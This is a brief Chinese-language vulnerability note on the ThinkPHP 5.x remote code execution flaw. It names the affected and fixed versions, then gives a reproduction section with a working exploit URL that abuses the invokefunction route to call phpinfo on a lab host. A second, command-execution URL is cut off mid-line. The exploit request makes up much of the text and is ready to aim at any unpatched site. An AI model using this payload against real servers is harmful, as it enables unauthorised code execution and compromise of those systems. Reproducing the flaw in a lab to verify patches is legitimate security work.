漏洞简述
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
影响范围
受影响的版本
ThinkPHP 5.0.x < 5.0.23
ThinkPHP 5.1.x < 5.1.31
不受影响的版本
ThinkPHP 5.0.23
ThinkPHP 5.1.31
复现过程
phpinfo、命令执行
http://192.168.1.7:8080/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
http://192.168.1.7:8080/index.php?s=index/think\app/invokefunction&function